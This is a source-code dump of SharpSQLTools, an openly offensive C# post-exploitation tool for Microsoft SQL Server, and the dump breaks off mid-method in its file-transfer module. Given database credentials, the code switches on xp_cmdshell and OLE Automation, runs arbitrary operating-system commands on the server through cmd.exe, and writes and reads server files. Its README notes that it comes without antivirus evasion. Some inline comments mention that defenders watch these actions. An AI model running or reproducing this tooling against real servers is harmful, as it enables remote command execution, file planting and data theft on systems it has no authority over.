├── Image
├── blog_2021-06-19_13-51-03.png
├── blog_2021-06-19_13-52-10.png
├── blog_2021-06-19_13-52-44.png
└── blog_2021-06-19_13-52-59.png
├── SharpSQLTools
├── app.config
├── Properties
│ └── AssemblyInfo.cs
├── FunModule
│ ├── ExecOptions.cs
│ ├── Batch.cs
│ └── FilesOptions.cs
├── Domain
│ └── Info.cs
├── SharpSQLTools.csproj
├── Program.cs
└── Setting.cs
├── SharpSQLTools.sln
└── README.md
/Image/blog_2021-06-19_13-51-03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-51-03.png
--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-10.png
--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-44.png
--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-59.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-59.png
--------------------------------------------------------------------------------
/SharpSQLTools/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SharpSQLTools.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSQLTools", "SharpSQLTools\SharpSQLTools.csproj", "{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Any CPU = Debug|Any CPU
9 | Release|Any CPU = Release|Any CPU
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
13 | {A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Debug|Any CPU.Build.0 = Debug|Any CPU
14 | {A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Release|Any CPU.ActiveCfg = Release|Any CPU
15 | {A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Release|Any CPU.Build.0 = Release|Any CPU
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/SharpSQLTools/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpSQLTools")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpSQLTools")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is the ID of the type library if this project is exposed to COM.
[assembly: Guid("1a54c5fe-ffa6-43f1-a5eb-7a1897181076")]

// Version information for an assembly consists of the following four values:
//
//      Major version
//      Minor version
//      Build number
//      Revision
//
// You can specify all the values, or default the build and revision numbers
// by using '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/ExecOptions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data;
4 | using System.Data.SqlClient;
5 | using System.Linq;
6 | using System.Text;
7 |
8 | namespace SharpSQLTools.FunModule
9 | {
/// <summary>
/// Runs operating-system commands through the connected SQL Server, either via
/// master..xp_cmdshell or via the OLE Automation procedures (sp_OACreate / sp_OAMethod).
/// Both paths depend on server options that are off by default; enabling them and
/// calling these procedures are well-known indicators that defenders monitor.
/// </summary>
class ExecOptions
{
    // Open connection supplied by the caller; this class never closes it.
    SqlConnection Conn;
    // Helper used to read and flip server configuration options (see Setting).
    Setting setting;

    /// <summary>Wraps an already-opened connection and its Setting helper.</summary>
    /// <param name="Conn">Connection used for every statement sent by this class.</param>
    /// <param name="setting">Helper used to check/enable 'Ole Automation Procedures'.</param>
    public ExecOptions(SqlConnection Conn, Setting setting)
    {
        this.Conn = Conn;
        this.setting = setting;
    }

    /// <summary>
    /// Executes <paramref name="Command"/> through master..xp_cmdshell and prints every
    /// returned row to the console.
    /// </summary>
    /// <param name="Command">Command line; interpolated into the T-SQL string literal
    /// without escaping, so a single quote in it breaks the statement.</param>
    public void xp_cmdshell(String Command)
    {
        var sqlstr = $@"exec master..xp_cmdshell '{Command}'";
        // Flag=true: RemoteExec concatenates all result rows, one per line.
        Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
    }

    /// <summary>
    /// Executes <paramref name="Command"/> through the OLE Automation procedures
    /// (wscript.shell 'exec') and prints the captured StdOut, limited to varchar(8000).
    /// </summary>
    /// <param name="Command">Command line passed to cmd.exe /c; formatted into the T-SQL
    /// literal without escaping.</param>
    public void sp_cmdshell(String Command)
    {
        // When 'Ole Automation Procedures' is currently 0 (disabled), try to enable it.
        // NOTE(review): the method returns as soon as Enable_ola() reports success, so the
        // command is not sent on the same call that enabled the option.
        if (setting.Check_configuration("Ole Automation Procedures", 0))
        {
            if (setting.Enable_ola()) return;
        }
        // {0} is the command; the batch spawns cmd.exe, reads its StdOut into @str and selects it.
        var sqlstr = String.Format(@"
declare @shell int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}'
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'ReadAll', @str out
select @str", Command);
        Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
    }
}
51 | }
52 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ### 简介
2 |
3 | 需改版,就去看看 https://github.com/uknowsec/SharpSQLTools 的实现。
4 |
5 | #####
6 |
7 | ### Usage
8 |
9 | ```
10 | λ SharpSQLTools.exe
11 |
12 | _____ _ _____ ____ _ _______ _
13 | / ____| | / ____|/ __ \| | |__ __| | |
14 | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___
15 | \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __|
16 | ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \
17 | |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
18 | | |
19 | |_|
20 | by Rcoil & Uknow
21 |
22 | SharpSQLTools target username password
23 |
24 | Module:
25 | enable_xp_cmdshell - you know what it means
26 | disable_xp_cmdshell - you know what it means
27 | xp_cmdshell {cmd} - executes cmd using xp_cmdshell
28 | enable_ole - you know what it means
29 | disable_ole - you know what it means
30 | sp_cmdshell {cmd} - executes cmd using sp_oacreate
31 | upload {local} {remote} - upload a local file to a remote path (OLE required)
32 | download {remote} {local} - download a remote file to a local path
33 | exit - terminates the server process (and this session)
34 |
35 | ```
36 |
37 |
38 |
39 | ### 20210627 添加 GUI
40 |
41 | 我只是实现功能,不提供免杀。
42 |
43 | 
44 |
45 | 
46 |
47 | 
48 |
49 | 
--------------------------------------------------------------------------------
/SharpSQLTools/Domain/Info.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SharpSQLTools.Domain
7 | {
/// <summary>Console help text: the banner, the invocation line and the module list.</summary>
class Info
{
    /// <summary>Prints the banner and then the module list.</summary>
    public static void ShowUsage()
    {
        ShowLogo();
        ShowModuleUsage();
    }

    /// <summary>Prints the interactive modules together with their arguments.</summary>
    public static void ShowModuleUsage()
    {
        const string moduleHelp = @"
Module:
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
enable_ole - you know what it means
disable_ole - you know what it means
sp_cmdshell {cmd} - executes cmd using sp_oacreate
upload {local} {remote} - upload a local file to a remote path (OLE required)
download {remote} {local} - download a remote file to a local path
exit - terminates the server process (and this session)";
        Console.WriteLine(moduleHelp);
    }

    /// <summary>Prints the ASCII-art banner followed by the command-line invocation.</summary>
    public static void ShowLogo()
    {
        const string banner = @"
_____ _ _____ ____ _ _______ _
/ ____| | / ____|/ __ \| | |__ __| | |
| (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___
\___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __|
____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \
|_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
| |
|_|
by Rcoil & Uknow

SharpSQLTools target username password

";
        Console.WriteLine(banner);
    }
}
51 | }
52 |
--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/Batch.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data;
4 | using System.Data.SqlClient;
5 | using System.IO;
6 | using System.Linq;
7 | using System.Text;
8 |
9 | namespace SharpSQLTools.FunModule
10 | {
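/// <summary>
/// Thin wrappers that send a T-SQL batch over an existing connection. Failures are
/// reported on the console rather than thrown; <see cref="RemoteExec"/> then returns
/// null, which callers that parse the result must be prepared for.
/// </summary>
class Batch
{
    /// <summary>
    /// Executes <paramref name="Command"/> as a text command and collects column 0 of
    /// every returned row.
    /// </summary>
    /// <param name="Conn">Open connection; it is not closed by this method.</param>
    /// <param name="Command">T-SQL batch sent verbatim (no parameters are used).</param>
    /// <param name="Flag">true: every row is appended, each prefixed with "\r\n";
    /// false: only the last row's value is kept.</param>
    /// <returns>The collected text (empty string when no rows), or null when executing
    /// the command raised an exception.</returns>
    public static string RemoteExec(SqlConnection Conn, String Command, Boolean Flag)
    {
        try
        {
            // SqlCommand and SqlDataReader are IDisposable: dispose them deterministically
            // instead of leaving the reader/command to the finalizer.
            using (SqlCommand cmd = new SqlCommand(Command, Conn))
            {
                cmd.CommandType = CommandType.Text;
                using (SqlDataReader reader = cmd.ExecuteReader())
                {
                    var collected = new StringBuilder();
                    while (reader.Read())
                    {
                        string cell = reader[0].ToString();
                        if (Flag)
                        {
                            collected.Append("\r\n").Append(cell);
                        }
                        else
                        {
                            // Keep only the most recent row.
                            collected.Clear().Append(cell);
                        }
                    }
                    return collected.ToString();
                }
            }
        }
        catch (Exception ex)
        {
            // Best-effort reporting; null signals failure to the caller.
            Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            return null;
        }
    }

    /// <summary>
    /// Executes <paramref name="Command"/> as a text command without reading a result set.
    /// </summary>
    /// <param name="Conn">Open connection; it is not closed by this method.</param>
    /// <param name="Command">T-SQL batch sent verbatim.</param>
    public static void CLRExec(SqlConnection Conn, String Command)
    {
        try
        {
            using (SqlCommand cmd = new SqlCommand(Command, Conn))
            {
                cmd.CommandType = CommandType.Text;
                cmd.ExecuteNonQuery();
            }
        }
        catch (Exception ex)
        {
            // Best-effort reporting; the failure is otherwise swallowed.
            Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        }
    }
}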
69 | }
70 |
--------------------------------------------------------------------------------
/SharpSQLTools/SharpSQLTools.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}
8 | Exe
9 | Properties
10 | SharpSQLTools
11 | SharpSQLTools
12 | v4.0
13 | 512
14 |
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
64 |
--------------------------------------------------------------------------------
/SharpSQLTools/Program.cs:
--------------------------------------------------------------------------------
1 | using SharpSQLTools.Domain;
2 | using SharpSQLTools.FunModule;
3 |
4 | using System;
5 | using System.Collections;
6 | using System.Collections.Generic;
7 | using System.Data;
8 | using System.Data.SqlClient;
9 | using System.IO;
10 | using System.Linq;
11 | using System.Threading;
12 |
13 | namespace SharpSQLTools
14 | {
/// <summary>
/// Console entry point: connects to the target SQL Server with the credentials given on
/// the command line and runs an interactive loop that dispatches the modules listed by
/// <see cref="Info.ShowModuleUsage"/>. Any other input line is sent to the server as raw T-SQL.
/// </summary>
class Program
{
    /// <summary>
    /// Handler for <see cref="SqlConnection.InfoMessage"/>: prints the text of every
    /// informational message the server sends alongside a result.
    /// </summary>
    /// <param name="mySender">Event source (unused).</param>
    /// <param name="args">Carries the server's messages in <c>Errors</c>.</param>
    public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
    {
        var value = String.Empty;
        foreach (SqlError err in args.Errors)
        {
            // 'value' only ever holds the current message; nothing is accumulated.
            value = err.Message;
            Console.WriteLine(value);
        }
    }

    /// <summary>
    /// Opens a connection to the master database using SQL Server authentication.
    /// </summary>
    /// <param name="target">Value of the connection string's Server keyword.</param>
    /// <param name="username">SQL login name.</param>
    /// <param name="password">Password for the login. It is embedded in clear text in the
    /// connection string and is also visible on this process's command line.</param>
    /// <returns>The opened connection. On any failure the error is printed and the process
    /// exits, so a null is never returned to the caller.</returns>
    static SqlConnection SqlConnet(string target, string username, string password)
    {
        SqlConnection Conn = null;
        // Keyword values are wrapped in double quotes; SQL authentication (User ID/Password), not integrated security.
        var connectionString = $"Server = \"{target}\";Database = \"master\";User ID = \"{username}\";Password = \"{password}\";";
        try
        {
            Conn = new SqlConnection(connectionString);
            // Surface server-side informational messages on the console.
            Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
            Conn.Open();
            Console.WriteLine("[*] Database connection is successful!");
        }
        catch (Exception ex)
        {
            Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            // NOTE(review): exit code 0 on a failed connection hides the failure from calling scripts.
            Environment.Exit(0);
        }
        return Conn;
    }

    /// <summary>
    /// Usage: <c>SharpSQLTools target username password</c>. Reads lines from the
    /// <c>SQL&gt;</c> prompt until "exit", an unhandled error, or a dropped connection.
    /// </summary>
    /// <param name="args">Exactly three arguments: target, username, password; anything else prints the usage.</param>
    static void Main(string[] args)
    {
        if (args.Length != 3)
        {
            Info.ShowUsage();
            return;
        }

        var Conn = SqlConnet(args[0], args[1], args[2]);
        var setting = new Setting(Conn);
        var filesOptions = new FilesOptions(Conn, setting);
        var execOptions = new ExecOptions(Conn, setting);

        try
        {
            do
            {
                Console.Write("SQL> ");
                string str = Console.ReadLine();
                // NOTE(review): ReadLine() returns null at end of input; ToLower() then throws and the
                // outer catch closes the connection and ends the loop.
                if (str.ToLower() == "exit") { Conn.Close(); break; }
                else if (str.ToLower() == "help") { Info.ShowModuleUsage(); continue; }

                // At most three tokens: module name, first argument, rest of the line.
                string[] cmdline = str.Split(new char[] { ' ' }, 3);
                // Everything after the module name, re-joined with a trailing space.
                String s = String.Empty;
                for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; }

                switch (cmdline[0].ToLower())
                {
                    case "enable_xp_cmdshell":
                        setting.Enable_xp_cmdshell();
                        break;
                    case "disable_xp_cmdshell":
                        setting.Disable_xp_cmdshell();
                        break;
                    case "xp_cmdshell":
                        execOptions.xp_cmdshell(s);
                        break;
                    case "enable_ole":
                        setting.Enable_ola();
                        break;
                    case "disable_ole":
                        setting.Disable_ole();
                        break;
                    case "sp_cmdshell":
                        execOptions.sp_cmdshell(s);
                        break;
                    case "upload":
                        // NOTE(review): cmdline[1]/cmdline[2] are not checked; fewer than three tokens
                        // throws IndexOutOfRangeException, which ends the session via the outer catch.
                        filesOptions.UploadFiles(cmdline[1], cmdline[2]);
                        break;
                    case "download":
                        // Console syntax is "download {remote} {local}"; DownloadFiles takes (local, remote).
                        filesOptions.DownloadFiles(cmdline[2], cmdline[1]);
                        break;
                    default:
                        // Not a module name: run the whole line as T-SQL and print every row.
                        Console.WriteLine(Batch.RemoteExec(Conn, str, true));
                        break;
                }
                // Stop once the connection is no longer open.
                if (!ConnectionState.Open.Equals(Conn.State))
                {
                    Console.WriteLine("[!] Disconnect....");
                    break;
                }
            }
            while (true);
        }
        catch (Exception ex)
        {
            // Any unhandled error ends the session; close before reporting.
            Conn.Close();
            Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        }
    }
}
120 | }
121 |
--------------------------------------------------------------------------------
/SharpSQLTools/Setting.cs:
--------------------------------------------------------------------------------
1 | using SharpSQLTools.FunModule;
2 |
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Data.SqlClient;
6 | using System.Linq;
7 | using System.Text;
8 |
9 | namespace SharpSQLTools
10 | {
/// <summary>
/// Reads and flips server configuration options through sp_configure, and checks for
/// files on the server with xp_fileexist. Every query is built by string formatting;
/// the option names used by this class are fixed literals.
/// NOTE(review): changing 'xp_cmdshell' / 'Ole Automation Procedures' via sp_configure is a
/// classic post-exploitation indicator and a natural server-side alerting point.
/// </summary>
class Setting
{
    // Scratch holder for the last T-SQL batch built by any method.
    private String Command = String.Empty;
    // Open connection supplied by the caller; not closed here.
    public SqlConnection Conn = null;

    /// <summary>Wraps an already-opened connection.</summary>
    /// <param name="Connection">Connection used for every statement.</param>
    public Setting(SqlConnection Connection)
    {
        Conn = Connection;
    }

    /// <summary>
    /// Checks whether a file exists on the server's file system via master.dbo.xp_fileexist.
    /// </summary>
    /// <param name="path">Server-side path, inserted into the T-SQL literal without escaping.</param>
    /// <returns>true when xp_fileexist reports 1.</returns>
    /// <exception cref="ArgumentNullException">When the query failed: RemoteExec returns null
    /// and int.Parse rejects it.</exception>
    /// <exception cref="FormatException">When the returned value is not an integer.</exception>
    public bool File_Exists(String path)
    {
        Command = String.Format(@"
DECLARE @r INT
EXEC master.dbo.xp_fileexist '{0}', @r OUTPUT
SELECT @r as n", path);
        // Flag=false: RemoteExec returns the single value as a string.
        if (int.Parse(Batch.RemoteExec(Conn, Command, false)) == 1)
            return true;
        return false;
    }

    /// <summary>
    /// Sets a server configuration option with sp_configure + RECONFIGURE and verifies it.
    /// </summary>
    /// <param name="option">sp_configure option name.</param>
    /// <param name="value">Desired value (0 or 1 for the options used by this class).</param>
    /// <returns>Result of <see cref="Check_configuration"/> after the change.</returns>
    public bool Set_configuration(String option, int value)
    {
        Command = String.Format("exec master.dbo.sp_configure '{0}',{1}; RECONFIGURE;", option, value);
        // The statement's own output is ignored; success is decided by re-reading the option.
        Batch.RemoteExec(Conn, Command, false);
        return Check_configuration(option, value);
    }

    /// <summary>
    /// Reads an option's configured value from sys.configurations and compares it with
    /// <paramref name="value"/>.
    /// </summary>
    /// <param name="option">sp_configure option name.</param>
    /// <param name="value">Expected value.</param>
    /// <returns>true when the stored value equals <paramref name="value"/>.</returns>
    /// <exception cref="ArgumentNullException">When the query failed and RemoteExec returned null.</exception>
    public bool Check_configuration(String option, int value)
    {
        // NOTE(review): selects the 'value' column (configured value) rather than 'value_in_use';
        // they agree here only because Set_configuration runs RECONFIGURE first — confirm if that changes.
        Command = String.Format("SELECT cast(value as INT) as v FROM sys.configurations where name = '{0}';", option);
        if (int.Parse(Batch.RemoteExec(Conn, Command, false)) == value)
            return true;
        return false;
    }

    #region 启用/关闭 OLE Automation Procedures 配置

    /// <summary>
    /// Enables 'Ole Automation Procedures'. 'show advanced options' is switched on first
    /// and left on afterwards (compare <see cref="Disable_ole"/>, which turns it back off).
    /// </summary>
    /// <returns>true when both options were set and verified; false after printing which step failed.</returns>
    public bool Enable_ola()
    {
        if (!Set_configuration("show advanced options", 1))
        {
            Console.WriteLine("[!] cannot enable 'show advanced options'");
            return false;
        }
        if (!Set_configuration("Ole Automation Procedures", 1))
        {
            Console.WriteLine("[!] cannot enable 'Ole Automation Procedures'");
            return false;
        }
        return true;
    }

    /// <summary>
    /// Disables 'Ole Automation Procedures' and then turns 'show advanced options' back off.
    /// Note the naming mismatch with <see cref="Enable_ola"/> ("ola" vs "ole").
    /// </summary>
    /// <returns>true when all three steps were set and verified; false after printing which step failed.</returns>
    public bool Disable_ole()
    {
        if (!Set_configuration("show advanced options", 1))
        {
            Console.WriteLine("[!] cannot enable 'show advanced options'");
            return false;
        }
        if (!Set_configuration("Ole Automation Procedures", 0))
        {
            Console.WriteLine("[!] cannot disable 'Ole Automation Procedures'");
            return false;
        }
        if (!Set_configuration("show advanced options", 0))
        {
            Console.WriteLine("[!] cannot disable 'show advanced options'");
            return false;
        }
        return true;
    }

    #endregion


    #region 启用/关闭 xp_cmdshell
    /// <summary>
    /// Enables 'xp_cmdshell'. 'show advanced options' is switched on first and left on.
    /// </summary>
    /// <returns>true when both options were set and verified; false after printing which step failed.</returns>
    public bool Enable_xp_cmdshell()
    {
        if (!Set_configuration("show advanced options", 1))
        {
            Console.WriteLine("[!] cannot enable 'show advanced options'");
            return false;
        }
        if (!Set_configuration("xp_cmdshell", 1))
        {
            Console.WriteLine("[!] cannot enable 'xp_cmdshell'");
            return false;
        }
        return true;
    }

    /// <summary>
    /// Disables 'xp_cmdshell' and then turns 'show advanced options' back off.
    /// </summary>
    /// <returns>true when all three steps were set and verified; false after printing which step failed.</returns>
    public bool Disable_xp_cmdshell()
    {
        if (!Set_configuration("show advanced options", 1))
        {
            Console.WriteLine("[!] cannot enable 'show advanced options'");
            return false;
        }
        if (!Set_configuration("xp_cmdshell", 0))
        {
            Console.WriteLine("[!] cannot disable 'xp_cmdshell'");
            return false;
        }
        if (!Set_configuration("show advanced options", 0))
        {
            Console.WriteLine("[!] cannot disable 'show advanced options'");
            return false;
        }
        return true;
    }

    #endregion

}
146 | }
147 |
--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/FilesOptions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Data.SqlClient;
4 | using System.IO;
5 | using System.Linq;
6 | using System.Threading;
7 |
8 | namespace SharpSQLTools.FunModule
9 | {
/// <summary>
/// File transfer over the SQL connection: upload through the OLE Automation procedures
/// (ADODB.Stream plus wscript.shell), download through OPENROWSET(BULK ...).
/// An upload writes temporary "*.config_txt" parts next to the target and spawns cmd.exe
/// on the server to join and delete them.
/// </summary>
class FilesOptions
{
    // Open connection supplied by the caller.
    SqlConnection Conn;
    // Configuration helper (OLE option check, xp_fileexist).
    Setting setting;
    // Scratch holder for the T-SQL / command text being built.
    String sqlstr;

    /// <summary>Wraps an already-opened connection and its Setting helper.</summary>
    /// <param name="Conn">Connection used for every statement.</param>
    /// <param name="setting">Helper used for the OLE option check and file-existence checks.</param>
    public FilesOptions(SqlConnection Conn, Setting setting)
    {
        this.Conn = Conn;
        this.setting = setting;
    }

    /// <summary>
    /// Splits a string into consecutive pieces of <paramref name="charNumber"/> characters;
    /// the last piece holds whatever remains. An empty string yields an empty list.
    /// </summary>
    /// <param name="txtString">Text to split.</param>
    /// <param name="charNumber">Piece length in characters; must be positive (0 never advances the loop).</param>
    /// <returns>Non-generic ArrayList holding the string pieces in order.</returns>
    private ArrayList GetSeparateSubString(string txtString, int charNumber)
    {
        ArrayList arrlist = new ArrayList();
        string tempStr = txtString;
        for (int i = 0; i < tempStr.Length; i += charNumber)
        {
            if ((tempStr.Length - i) > charNumber)// a full piece remains: cut it
            {
                arrlist.Add(tempStr.Substring(i, charNumber));
            }
            else
            {
                arrlist.Add(tempStr.Substring(i));// otherwise take the remainder
            }
        }
        return arrlist;
    }

    /// <summary>
    /// Uploads a local file using ADODB.Stream via the OLE Automation procedures.
    /// The file is hex-encoded and written in 150000-hex-digit (75000-byte) parts named
    /// "{remoteFile}_{n}.config_txt", each verified with xp_fileexist; the parts are then
    /// joined with "copy /b" and deleted, both through wscript.shell 'run'.
    /// </summary>
    /// <param name="localFile">Local path to read.</param>
    /// <param name="remoteFile">Destination path on the server; inserted into T-SQL and cmd
    /// lines without escaping.</param>
    public void UploadFiles(String localFile, String remoteFile)
    {
        Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));

        // When 'Ole Automation Procedures' is currently 0 (disabled), try to enable it.
        // NOTE(review): returns as soon as Enable_ola() reports success, so the upload does
        // not happen on the same call that enabled the option.
        if (setting.Check_configuration("Ole Automation Procedures", 0))
        {
            if (setting.Enable_ola()) return;
        }

        int count = 0;
        try
        {
            // Whole file as upper-case hex, two digits per byte.
            string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));

            ArrayList arrlist = GetSeparateSubString(hexString, 150000);

            foreach (string hex150000 in arrlist)
            {
                count++;
                string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);

                // {0} = hex payload written as a 0x literal, {1} = part path.
                // Type 1 and SaveToFile mode 2 are ADODB constants (binary stream, overwrite) — verify against ADO docs.
                sqlstr = String.Format(@"
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken", hex150000, filePath);

                Batch.RemoteExec(Conn, sqlstr, false);
                if (setting.File_Exists(filePath))
                {
                    Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
                }
                else
                {
                    // A missing part aborts the whole process (exit code 0); parts already written stay on the server.
                    Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
                    Conn.Close();
                    Environment.Exit(0);
                }

                // Fixed pause between parts.
                Thread.Sleep(5000);
            }

            // Opens a T-SQL string literal; it is closed by the trailing quote appended to sqlstr below.
            string shell = String.Format(@"
DECLARE @SHELL INT
EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT
EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");

            // Builds "copy /b part1+part2+...+partN target'"; the final quote closes the literal above.
            // NOTE(review): for an empty local file count is 0, the loop body never runs and the literal stays open.
            sqlstr = "copy /b ";
            for (int i = 1; i < count + 1; i++)
            {
                if (i != count)
                {
                    sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
                }
                else
                {
                    sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
                }
            }

            Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
            Batch.RemoteExec(Conn, shell + sqlstr, false);
            Thread.Sleep(5000);

            // Deletes every *.config_txt in the target's directory, not only this upload's parts.
            sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
            Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
            Batch.RemoteExec(Conn, shell + sqlstr, false);

            if (setting.File_Exists(remoteFile))
            {
                Console.WriteLine("[*] '{0}' Upload completed", localFile);
            }
            // Nothing is printed when the joined file is missing.
        }
        catch (Exception ex)
        {
            // Any failure (local read error, a query failure surfaced by File_Exists, ...) closes the connection.
            Conn.Close();
            Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        }
    }

    /// <summary>
    /// Downloads a server-side file with OPENROWSET(BULK ..., SINGLE_BLOB) and writes the
    /// blob to <paramref name="localFile"/>, overwriting it. Note the parameter order: the
    /// console syntax is "download {remote} {local}" and Main swaps the tokens to match.
    /// </summary>
    /// <param name="localFile">Local destination path (created or overwritten).</param>
    /// <param name="remoteFile">Server-side path; inserted into the T-SQL literal without escaping.</param>
    public void DownloadFiles(String localFile, String remoteFile)
    {
        Console.WriteLine(String.Format("[*] Downloading '{0}' to '{1}'...", remoteFile, localFile));

        if (!setting.File_Exists(remoteFile))
        {
            Console.WriteLine("[!] {0} file does not exist....", remoteFile);
            return;
        }

        sqlstr = String.Format(@"SELECT * FROM OPENROWSET(BULK N'{0}', SINGLE_BLOB) rs", remoteFile); // SINGLE_BLOB returns the whole file as one binary value
        // NOTE(review): the SqlCommand is IDisposable but is never disposed here, and exceptions
        // are not caught in this method — they propagate to the caller.
        SqlCommand sqlComm = new SqlCommand(sqlstr, Conn);

        // Read the query result.
        using (SqlDataReader reader = sqlComm.ExecuteReader())
        {
            // Each row rewrites the local file (FileMode.Create); a single row is expected.
            while (reader.Read())
            {
                // The byte[] is copied through a MemoryStream before being written; writing it directly would be equivalent.
                using (MemoryStream memoryStream = new MemoryStream((byte[])reader[0]))
                {
                    using (FileStream fileStream = new FileStream(localFile, FileMode.Create, FileAccess.Write))
                    {
                        byte[] bytes = new byte[memoryStream.Length];
                        // The number of bytes actually read is not checked.
                        memoryStream.Read(bytes, 0, (int)memoryStream.Length);
                        fileStream.Write(bytes, 0, bytes.Length);
                    }
                }
            }
        }

